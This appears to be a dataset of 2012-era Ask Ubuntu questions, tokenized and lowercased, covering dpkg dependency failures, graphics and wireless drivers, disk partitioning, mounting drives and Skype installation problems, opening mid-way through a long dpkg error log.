2.20.1-0ubuntu2.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgtk2.0-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libnotify-dev : libnotify-dev depends on libgtk2.0-dev ( > = 2.10 ) ; however : package libgtk2.0-dev is not configured yet . dpkg : error processing libnotify-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of network-manager-gnome : network-manager-gnome depends on libgtk2.0-0 ( > = 2.16.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing network-manager-gnome ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openoffice.org-core : openoffice.org-core depends on libgtk2.0-0 ( > = 2.10 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing openoffice.org-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openoffice.org-draw : openoffice.org-draw depends on openoffice.org-core ( = 1:3.2.0-7ubuntu4.4 ) ; however : package openoffice.org-core is not configured yet . dpkg : error processing openoffice.org-draw ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openoffice.org-impress : openoffice.org-impress depends on openoffice.org-core ( = 1:3.2.0-7ubuntu4.4 ) ; however : package openoffice.org-core is not configured yet . openoffice.org-impress depends on openoffice.org-draw ( = 1:3.2.0-7ubuntu4.4 ) ; however : package openoffice.org-draw is not configured yet . dpkg : error processing openoffice.org-impress ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of pidgin : pidgin depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing pidgin ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up update-manager ( 1:0.134.12.1 ) ... locale : can not set lc_ctype to default locale : no such file or directory dpkg : error processing update-manager ( -- configure ) : subprocess installed post-installation script returned error exit status 245 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of update-notifier : update-notifier depends on libgtk2.0-0 ( > = 2.14.0 ) ; however : package libgtk2.0-0 is not configured yet . update-notifier depends on update-manager ; however : package update-manager is not configured yet . dpkg : error processing update-notifier ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xulrunner-1.9.2 : xulrunner-1.9.2 depends on libgtk2.0-0 ( > = 2.18.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing xulrunner-1.9.2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of xulrunner-1.9.2-dev : xulrunner-1.9.2-dev depends on xulrunner-1.9.2 ( = 1.9.2.28+build1+nobinonly-0ubuntu0.10.04.1 ) ; however : package xulrunner-1.9.2 is not configured yet . xulrunner-1.9.2-dev depends on libnotify-dev ; however : package libnotify-dev is not configured yet . dpkg : error processing xulrunner-1.9.2-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of icedtea6-plugin : icedtea6-plugin depends on xulrunner-1.9.2 ; however : package xulrunner-1.9.2 is not configured yet . icedtea6-plugin depends on libgtk2.0-0 ( > = 2.8.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing icedtea6-plugin ( -- configure ) : dependency problems - leaving unconfigured setting up libgweather-common ( 2.30.0-0ubuntu1.1 ) ... no apport report written because maxreports is reached already locale : can not set lc_ctype to default locale : no such file or directory dpkg : error processing libgweather-common ( -- configure ) : subprocess installed post-installation script returned error exit status 245 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgweather1 : libgweather1 depends on libgtk2.0-0 ( > = 2.11.0 ) ; however : package libgtk2.0-0 is not configured yet . libgweather1 depends on libgweather-common ( > = 2.24.0 ) ; however : package libgweather-common is not configured yet . dpkg : error processing libgweather1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openoffice.org-style-galaxy : openoffice.org-style-galaxy depends on openoffice.org-core ( > = 1:3.2.0~beta ) ; however : package openoffice.org-core is not configured yet . no apport report written because maxreports is reached already dpkg : error processing openoffice.org-style-galaxy ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openoffice.org-common : openoffice.org-common depends on openoffice.org-style-default | openoffice.org-style ; however : package openoffice.org-style-default is not installed . package openoffice.org-style-galaxy which provides openoffice.org-style-default is not configured yet . package openoffice.org-style is not installed . package openoffice.org-style-galaxy which provides openoffice.org-style is not configured yet . no apport report written because maxreports is reached already dpkg : error processing openoffice.org-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : shared-mime-info libgtk2.0-0 chromium-browser chromium-codecs-ffmpeg chromium-browser-l10n libevdocument2 libevview2 evince firefox gcalctool libgdict-1.0-6 gnome-utils gtk2-engines-pixbuf libedataserverui1.2-8 libgail18 libgtk2.0-bin libgtk2.0-dev libnotify-dev network-manager-gnome openoffice.org-core openoffice.org-draw openoffice.org-impress pidgin update-manager update-notifier xulrunner-1.9.2 xulrunner-1.9.2-dev icedtea6-plugin libgweather-common libgweather1 openoffice.org-style-galaxy openoffice.org-common e : sub-process /usr/bin/dpkg returned an error code ( 1 ) while typing command in terminal , command is not auto-completing .
213739	an error occurred - help please	e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_talkplugin_deb_dists_stable_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report .
213741	problems with 12.10 and mac mini 2012	when installing ubuntu 12.10 on a mac mini 6,2 ( 2012 model ) , it does n't detect any network interface . how can i fix this ?
213742	can i update my usb stick to a new version without filling it up and ruining the persistent space ?	i have a 4gb stick with lubuntu on it , and 3gb is assigned to persistence . would i be able to update 12.10 without filling it up and making it useless until i fix it ?
213745	hybrid graphics on desktop with ivy bridge	while there 's plenty of resources on laptop hybrid graphics , i could n't find any relevant info on desktop hybrid graphics . suppose following scenario : i have an ivy bridge cpu with integrated gpu and a discrete gpu . can i switch between them without rebooting ? ( my display has two inputs , so i want to literally switch active devices ) thanks
213749	how to set mouse wheel tilt click support up ?	my new mouse ( logitech rx250 ) supports a new feature - scroll wheel tilt : it feels like clicking if i lean the wheel to the left or to the right . but it does nothing . i would like to set it up to do do something ( act like home/end for example ) . how to do it ?
213755	how may i clean all the cruft from 12.04 ?	i do not want any games . i do not want any av-related stuff ( no music , no videos , no photos , ... no entertainment at all ) . i do not want the libreoffice package ( s ) . i am thinking about just installing the server edition , but it is a dual boot machine and wubi was a very convenient way to get it going .
213758	does home directory encryption depend on gnome keyring ?	my gnome-keyring has somehow gotten messed up . it prompts for a password ( that i know i never provided - yes i chose 'unsafe storage ' ) . none of the possible passwords that i use ( including empty ) are working . so basically i want to delete the default key so i can start over . i just want to confirm that this is n't somehow tied to my home directory encryption . i want to be sure that if i delete the default key from it , i will still be able to log in normally and decrypt my home directory . it seems likely that they 're unrelated as the keyring is within the home directory and is thus itself encrypted , but i just thought i 'd ask . anyone have any thoughts ?
213759	i 'm unable to find /usr/share/plymouth/themes/	i 'm thinking about customizing a theme for ubuntu 12.10 . the problem is that i 've looked through the /usr/share directory and i have n't been able to find the plymouth folder . what can i do to get the folder ?
213762	how do i get both amd mobility radeon hd 4250 and 5650 's working in a laptop ?	my laptop has 2 gpus inside : amd mobility radeon hd 4250 amd mobility radeon hd 5650 after fresh installing ubuntu 12.10 , i tried installing official drivers , which broke unity and made it unusable . i tried downgrading xorg to 1.12 , installing fglrx-legacy which gave a black screen after starting ubuntu and nothing works , including the tty . looks like fglrx includes 5xxx drivers , fglrx-legacy 4xxx drivers and i have both cards . is n't there any other drivers that support both gpus ? ? the laptop is really overheating ( 79째c ) and it used to work normally in older ubuntus . ( 12.04 , 11.10 as i tried ) .
213763	how to enable new lock screen on gnome 3.6 ?	i 'm using gnome 3.6 ( ppa ) on ubuntu 12.10 but i do n't get the `` new '' lock screen . users reported new lock screen are available now . gnome lock screen ( screensaver ) is missing music controls how to disable sliding login screen in gnome 3.6 ? is there any specific settings to be enabled to get the new lock screen ?
213768	i need help installing java .	is there anyone on here who knows how to install java on ubuntu and is willing to teach me how via teamveiwer ? i would greatly appeciate it if you do . i have n't been able to play rs in 7 months . i 'm currently useing linux ubuntu 12.10 . also if someone can teach me how to use tar.gz files that would be awesome . i 'm new to linux and i have researched forums , guides , and youtube videos and i ca n't seem to figure it out
213769	disk drive for / not ready on boot after upgrade from 10.04 to 12.04	after upgrading ( using the upgrade button from the update manager ) from 10.04.4 to 12.04.1 , i can not boot anymore . upon booting , i am greeted with the ubuntu logo and the error `` the disk drive for / is not ready yet or not present '' . i have the option to wait , to skip and to access a basic shell . waiting overnight did nothing , skipping just gives me the same error for /tmp , /home , then for a uuid and finally it just goes to a black screen with a white `` _ '' in the top left corner . my setup is a dual boot one with xp on a single hard drive , i use separate partitions for / and /home . back in the day i installed 8.04 directly from the cd while leaving a partition for xp , which i installed after . this setup had never caused any such issues , even when upgrading from 8.04 to 10.04 . i have done plenty of research regarding this issue , as many others seem to have had similar issues after doing the same upgrade as me . however , while for most what fixed the problem was running : apt-get -f install after remounting / in read-write , it did n't do it for me . i got dependency errors ( see here ) , which i also investigated . i found https : //bugs.launchpad.net/ubuntu/+source/python-defaults/+bug/990740 where most people say the solution that worked is ( prior to running the above command ) running : apt-get install -o apt : :immediate-configure=false -f apt python-minimal but that also got me a lot of dependencies errors as output ( see here ) , similar to # 34 in the above thread . i also read that running : dpkg -- configure -a could help , at first it would n't run because it had trouble parsing /var/lib/dpkg/status since there was an extra blank line in a package description ( see https : //bugs.launchpad.net/ubuntu/+source/dpkg/+bug/916799 ) but i removed it using vim ( and then reran the command ) . it still gives me output that looks like an error , though . here it is : http : //paste.ubuntu.com/1338074/ . i also tried re-running the above apt-get commands after that , to no avail . i 'm running out of things to try in the hope of getting this fixed , your help would be very much appreciated ! thank you in advance .
213770	i got rid of unity but have gnome-panel : blank screen	i got rid of unity in my ubuntu 11.10 on a dell mini following the steps as in this post . i had ensured that i installed gnome-panel before i did this and removed unity from within gnome-panel . when i rebooted , all i have now is the blank scree with some text where my computer is running tests : it is stuck now at * checking battery status ... [ ok ] did i do something horribly wrong ? as this is a netbook , i do n't have a dvd tray to try and rescue ubuntu . if this is something horribly wrong , what do you suggest i do ? i have access to usb ports and can try a fresh install of say openbox or something via usb if that is possible . edit : i do n't have network access from the grun/root option . so i ca n't update my nvidia driver as in here
213777	are the newly launched nvidia drivers supported in ubuntu or will they be ?	nvidia just launched new versions of most of their geforce drivers . i heard they give performance improvements up to twice a fast . the nvidia geforce driver website mentions that it 's possible that the new drivers are not yet fully working in certain distributions . so , how fast does the ubuntu team usually adopt such driver updates ? or can i just install them without any risk ? ( i have a macbook pro , and i read in this question that someone else already has problems by installing the new driver ; i want to avoid that ... )
213778	desktop not getting keyboard focus after upgrade to 11.10	after upgrading from 11.04 to 11.10 , unity desktop icons do not get keyboard focus . as a result , can no longer rename or delete files from the desktop view , and any keyboard input continues to be directed to the last application with focus , e.g. , a text editor . the text control under each icon receives mouse focus but not keyboard focus , so is not editable , i.e . f2 or selecting 'rename ' from context menu has no effect . as you would suspect , with mouse focus on a desktop icon , the delete key has no effect . how to repair this please ?
213780	can i install networkmanager version 0.9.6.0 on 12.04 ?	the networkmanager version 0.9.4.0 from ubuntu 12.04 doesent support fully functional vpn connections over ipv6 . ( see do any networkmanager vpn plugins support ipv6 ? ) on ubuntu 12.10 with networkmanager version 0.9.6.0 i have no problem . how can i install the newer version on ubuntu 12.04 ?
213784	wireless not detected on a dell 5720 witha broadcom bcm 43142 ?	i recently installed ubuntu 12.10 on my dell inspiron 5720. sudo lshw -c network says : *-network unclaimed description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f1500000-f1507fff i tried troubleshooting for the same by browsing the forum.. but the debs mentioned are either for amd 64 or i3 32 bit . i checked http : //ubuntuforums.org/showthread.php ? t=2078800 but it dint help in anyway either . my laptop is an i5 64 bit . i tried the i3 32 bit dev and while installing , it said the package is of bad quality and is not recommended for installation . i installed anyway but it dint make any difference moreover , i think while trying to install the add-ons for ndisgtk , it threw error messages for the kernel pack . im losing my mind over this @ _ @ ps im completely new to linux thanks for the response . unfortunately neither of those two worked out for me . when i tried modprobe nothing really happened after reboot.and i just searched for the proprietary driver and looks like there are none for bcm43142
213787	how to join an avi video file split in files as : filename.avi.001 , filename.avi.002 , filename.avi.003 , etc ?	files spitted like that should be joined but they are not just fragments of video , but behave like archives . how to join them into one and restore the original form of the video ?
213793	sharing a video clip on ubuntu one	i published one video file on ubuntu one . sent the url to a friend , but he is unable to download it . firefox simply wants to play the file ( and that is an impossibly slow process ) . how can one make a video file downloadable ?
213796	how can i change permissions on an external hard drive that is booting as root ?	i had a mac powerbook g4 that suffered a series of kernel panics and finally died for reasons other than hard drive malfunction . that hard drive ( hd320gb ) was newish and in good shape , so it now resides in a rosewill enclosure external to my desk top computer where the operating system is ubuntu 12 . while the external ( former powerbook ) drive boots easily in the rosewill enclosure , i ca n't access my own files on that drive to move them . when i can , i plan to erase and reformat the external drive and use it for storage . i learned that i can see the contents of my file folders using gksu nautilus , and i can open the files , but i ca n't move them off the drive . the message i 'm getting is tha i do n't have permission , because ubuntu says i 'm not the owner . rather `` root '' appears as the owner of this external drive . so i know i need to change the permissions in the properties window , but i 'm not allowed that privilege . extra info : i ran sudo umount and sudo fdisk -l and got this : pops-desktop @ popsdesktop-sh67h3 : ~ $ sudo umount /media/hd320gb pops-desktop @ popsdesktop-sh67h3 : ~ $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000695d6 device boot start end blocks id system /dev/sda1 * 2048 470771711 235384832 83 linux /dev/sda2 470773758 488396799 8811521 5 extended /dev/sda5 470773760 488396799 8811520 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table i do n't know why i 'm seeing that last line of code . i 'm pretty sure that hard drive was formatted as hfs+ in the mac environment , and have n't read anything yet about how linux deals with that . one more thing - the ( now externally enclosed [ rosewill case ] ) hdd is a western digital scorpio blue hd ide drive . i used a jumper shunt to make it a slave drive . event at that , upon rebooting , it still shows as a root drive where i do n't have owner privileges . can i get some help , please ?
213798	dual boot options disappeared and now just boots straight into ubuntu	my netbook used to display an option to boot ubuntu or windows 7 but for some reason that no longer displays . now it just boots into ubuntu and i ca n't figure out how to get back into windows . i tried updating grub2 ( in terminal , i typed sudo update-grub and in the last line says found windows 7 ( loader ) on /dev/sda1 but restarts and still boots straight into ubuntu . how can i boot into windows ?
213803	hard disk partitioning during 12.04 install	attempting to install 12.04 lts on the following system : mainboard : msi k7t turbo ( ms-6330 v3.0 ) via kt133a chipset processor : amd athlon 1300 mhz hdd : wd eide 160gb lba single partition memory : 512 mb pc133 current os : windows 2000 sp4 i have also created a cd ( vs dvd ) using the infra recorder s/w as recommended by the ubuntu site . cd was created without incident . no indication of insufficient space on cd for the ubuntu installation files . current size - 729,067,520 bytes cdfs . problem : the partitioning of the hard disk stalls . it does not appear to detect the existing hdd and partition . additionally , the installation does not present options for creating/modifying the partition and just hangs . next : i am going to delete the existing partition and either 1 ) have unpartitioned media ready for install ; or 2 ) delete existing and re-create partition either formatted or non-formatted ready for install . i am going to create an installation dvd ( vs.cd ) per recommendation to see if this makes a difference . is there a limit to the hdd size for ubuntu install or is the hardware just too old ?
213806	ubuntu 12.10 - network manager not listing wireless networks	just recently reinstalled ubuntu 12.10 on my laptop ( dual-boot with windows 7 ) . had no problem accessing my home wireless network until today . all of a sudden , the network manager does n't seem to be picking up any wireless networks . my laptop 's wireless adapter is on , i can connect when i 'm using my windows 7 partition , and every other device in my house is able to connect . why would the wireless just drop off like this ? i can post the results of any commands i should run if that would help . edit : here is the requested additional information : sudo uname -a linux richard-hp-g62-notebook-pc 3.5.0-18-generic # 29-ubuntu smp fri oct 19 10:26:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux sudo lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) sudo ifconfig eth0 link encap : ethernet hwaddr 3c:4a:92:00 : aa:66 inet addr:192.168.0.114 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :3e4a:92ff : fe00 : aa66/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:58290 errors:0 dropped:0 overruns:0 frame:0 tx packets:3475 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7592666 ( 7.5 mb ) tx bytes:620983 ( 620.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3618 errors:0 dropped:0 overruns:0 frame:0 tx packets:3618 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:590058 ( 590.0 kb ) tx bytes:590058 ( 590.0 kb
213814	is 12.10 in sync with nvidia packages in ppa x-swat	i was checking https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates and noticed that there are no 12.10 packages . apart from this i heard that 12.10 will be focusing more on up to date video drivers ( nvidia and ati specially ) with all of the gaming / steam movement going around . so my question is if the x-swat ppa is still needed to be able to have the latest drivers for nvidia/ati/intel or can the additional drivers in ubuntu 12.10 be used for this .
213818	package operation failed ?	while updating , i got this error in update manager : installarchives ( ) failed : ( reading database ... [ ... ] ( reading database ... 100 % % ( reading database ... 168216 files and directories currently installed . ) preparing to replace libasound2 1.0.25-1ubuntu10 ( using ... /libasound2_1.0.25-1ubuntu10.1_i386.deb ) ... unpacking replacement libasound2 ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:4 > : data error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/libasound2_1.0.25-1ubuntu10.1_i386.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libasound2_1.0.25-1ubuntu10.1_i386.deb error in function :
213819	how to mount hard drive	a couple days ago my windows corrupted and i had to mount ubuntu onto a usb and install it onto a different hard drive that is also connected to the same computer . i have files that i would love to recover off that other computer but if it comes down to it i can get rid of them i would just like to be able to use the hard drive again . however whenever i try to open the hard drive it give me this error '' error mounting /dev/sda1 at /media/unknown/gateway : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/unknown/gateway '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . '' any help would be greatly appreciated . also if you could break down anything to basic info that would be great i 'm new to ubuntu so i do n't really know how to do a lot with it right now . new message '' error mounting /dev/sda1 at /media/unknown/gateway : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/unknown/gateway '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . ''
213820	how to set default zoom in evince ?	i really love how evince works but this little thing making me annoy so much.when i select a title or a subtitle from the content menu it shifts the zoom and i'am going crazy.on windows it was just easy as pie with foxit but its linux version really needs time.any solution or advice would make me grateful
213822	what version of ubuntu should i use ?	with my imac , i like to do lots of things at the same time , for example , browsing the web in chrome while making a 3d rendering with blender ; or developing in python using quickly while listening to music in banshee . i already use 12.10 , but my computer is very dirty of unnecesary data , and i want to remove my os x lion 's partition . so , as developer i need stable software and latest features , but as a common user i browse the web and play multimedia content ... so , should i use 12.10 , or instead 12.04 with a vm inside ?
213827	ip alias to virtual machine	thank you in advance for any help you can give . i have searched and searched and have not found an answer to my issue . i 'm not sure if this should be in virtualisation or networking - since it 's mostly a networking question , i 'll ask here . i have a rent-a-server with one nic and two real-world ip addresses . the first ip , 69.xxx.xxx.xxx , is the actual ip address of the server . the second ip , 209.xxx.xxx.xxx , is an ip alias . the interface is defined as follows : # loopback interface auto lo iface lo inet loopback # ethernet interface auto eth0 iface eth0 inet static address 69.xxx.xxx.xxx network 69.xxx.xxx.0 netmask 255.255.255.0 broadcast 69.xxx.xxx.255 gateway 69.xxx.xxx.1 # virtual interfaces auto eth0:0 iface eth0:0 inet static name ethernet alias lan card address 209.xxx.xxx.xxx netmask 255.255.255.255 the 69.xxx.xxx.xxx address has a web server and a number of functioning services on it . the 209.xxx.xxx.xxx address is a recently purchased address . it `` pings '' as defined above . i 've no previous experience with ip aliaes , but as i understand it , the address is not associated with a network at all . there is no broadcast or gateway associated with the address . i am attempting to install a product that functions within a virtual machine hosted on the same server . i want the virtual machine to be addressed by the 209.xxx.xxx.xxx address . the pre-built vmware based virtual machine obtains its ip through dhcp . both the host and virtual machine are ubuntu 10.04 server . i would prefer to change the vm to use the 209.xxx.xxx.xxx static ip , but have no idea how to set that up since there is no actual network/broadcast/gateway . when i attempt to set up the dhcp3-server on the host , it fails to start , issuing the error message : `` no subnet declaration for eth0:0 ( 0.0.0.0 ) . ** ignoring requests on eth0:0 . '' as if the eth0:0 interface is not up . the eth0:0 is , however , up . host : ubuntu 10.04 lts server version vm : vmware server 2.02 , guest ubuntu 10.04 lts server version anyone know how to set the above scenerio up ? is it even possible with an ip alias ?
213830	gparted wont resize extended partitions	i have dual booted windows 7 and ubuntu 12.04 lts and have decided that i need more space on my ubuntu partition . i used gparted on a live cd to shrink my windows 7 partition ( /dev/sda3 ) but when i try to resize the extended partition ( /dev/sda4 ) , which houses my linux partition ( /dev/sda6 ) , the right click options are greyed out and there is a key next to the extended partition . i have resized the partitions within the extended partition before to provide room , but now i can go no further with that , and need to grow the extended partition . the free space lies to the left of the extended partition and there is a small amount of free space directly to the right as well . also , within the extended partition is /dev/sda5 ( ntfs ) , which i have no idea what is on it , but most of the space ( 3.42gb ) is used , /dev/sda6 ( ext4 , mount point : / ) , my partition containing linux , and /dev/sda7 ( linux-swap ) . i hope you guys can help me with this because i really do n't want to screw something up while trying to resize the extended partition .
213837	unable to install skype on ubuntu 12.10 unity	i am new to using the ubuntu 12.10 64 bit os and i absolutely love it . this honestly feels like the biggest change since moving from my 1983 nec pc 22 lb . laptop to a desktop pc . but i can not , for the life of me , install skype . i have tried reading all over this website and the internet , and tried what feels like everything . i have purged it , run the update , etc . the most common way i have tried , other than all of the command line tips ive read , is going into the software center after adding the repositories , and trying to install from there . i then get a pop up after clicking install that says the followng : '' this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . '' when i click on 'details ' , it says : the following packages have unmet dependencies : skype : depends : skype-bin but it is not going to be installed i have tried to install it from the launchpad repository as suggested somewhere on here , and get no luck . i have removed it , and tried installing directly from the website as with no luck . i want to stay with ubuntu , i took the step at finally going with it , and feel i will have no choice but go back b/c i need skype . i would truly appreciate it if one of you can help me with this . it seems to be a bug of some sort , i 'm not sure . thank you all . james
213839	custom kernel , multimedia chortcuts for asus 1225c	several minutes compiled my custom kernel , checked everythink and it seems multimedia keys does n't work and not showed by xet and showkey . in my my opinion i have something disabled that corespondend to keys . on section x86 others drivers leaved my pc and several others support . for now only brightness control work , not volume control ... does n't anybody can give i bit information on what section i should look in order enable shortcuts again ? pc : intel atom 1225c fn+ f10 = mute sound fn+f11 = lower volume fn+f12 = upper volume fn+f9 = disable touchpad fn+f5= brightness down ( works ) fn+f5=brightness up ( works ) fn+f2= wireless on/off ( works )
213843	how to remove update repo that always fails	a week or so ago i tried to add a new package repo that supposedly had a package i wanted . unfortunately , the information about it was out of date , and i found that it fails to connect to it each time . i 'd like to just remove the new repo , but i 'm not sure how to do that . for context , when i update , i get this : w : failed to fetch http : //ppa.launchpad.net/geod/ppa-geod/ubuntu/dists/precise/main/source/sources 404 not found [ ip : 135.214.42.30 8080 ] , w : failed to fetch http : //ppa.launchpad.net/geod/ppa-geod/ubuntu/dists/precise/main/binary-amd64/packages 404 not found [ ip : 135.214.42.30 8080 ] , w : failed to fetch http : //ppa.launchpad.net/geod/ppa-geod/ubuntu/dists/precise/main/binary-i386/packages 404 not found [ ip : 135.214.42.30 8080 ] , e : some index files failed to download . they have been ignored , or old ones used instead .
213848	why does linux-image-virtual depend on a generic kernel now ?	the linux-image-virtual metapackage has historically provided a kernel that is specifically designed for use in virtual machines : ubuntu 8.04 : linux-image-2.6.24-32-virtual ubuntu 10.04 : linux-image-2.6.32-44-virtual ubuntu 11.10 : linux-image-3.0.0-26-virtual ubuntu 12.04 : linux-image-3.2.0-32-virtual apparently , this has now changed : ubuntu 12.10 : linux-image-3.5.0-17-generic what 's the explanation ? is this still the correct kernel to use in a virtual machine ?
213850	can i install ubuntu 12.10 on lenovo u350 ?	can i install ubuntu 12.10 on lenovo u350 with intel ulv 723 ( 1.2ghz ) cpu , and intel 4500m gma ? will it work normally ?
213852	fresh install of ubuntu on new hard drive to replace win 7	i have a 3 core hp laptop running windows 7 , and i do n't want windows 7 anymore , nor any of the mess of running a dual boot system . can i just replace my hd and install ubuntu and expect it to work ? will my wifi work with a different operating system than the one designed for this machine ?
213853	auto-mount filesystems on boot fails ( 12.10 )	i have a compaq hp 8200 slim desktop running 12.10 with encrypted partitions ( set up with the text-based installer ) . everything 's working fine , except ... when i boot the computer , my /boot and /boot/efi directories refuse to mount automatically . i 'm dropped to the root console , where i must enter 'mountall -v ' , and everything then continues on just fine . this was happening under 12.04 . i 've recently upgraded to 12.10 , and the problem persists . except now , in addition to /boot and /boot/efi not mounting , roughly 50 % of the time /var will not be auto-mounted as well ( and again , 'mountall -v ' fixes allows me to boot and move on ) . i 'm puzzled about this one . running 'fsck ' does n't seem to do anything ( the filesystems are n't damaged anyway ) . what can i try to solve this issue ? here 's my /etc/fstab : http : //paste.ubuntu.com/1338508/ thanks in advance ! ! ! addendum : i have tried changing the entries in fstab from uuids to the actual devices , to no avail .
213857	installing skype will not work - skype-bin not installable , and 'held broken packages '	so , i am trying to install skype through apt-get , but after running into this problem multiple times , and trying to find a solution , it still does n't work ... i tried all the answers here : installing skype on 12.04 64 bit causes errors , but i still get the error . ( my problem is exactly the same as that one , too ) i even went and edited the package status thing manually , and removed all references to 'skype ' or 'skype-bin ' . i still get the problem ... i 'm running ubuntu 12.10 , as a dual-boot with windows 7 . it 's a 64-bit computer .
213858	gtk textview : pango letter spacing	i am desperatly trying to find some working solution on how to modify the letter spacing in a gtk textview . i am using python with gtk 3.6 -- it seems that the solution is to somehow use pango , but i do n't understand how . so any working prototype would be greatly appreciated . thanks !
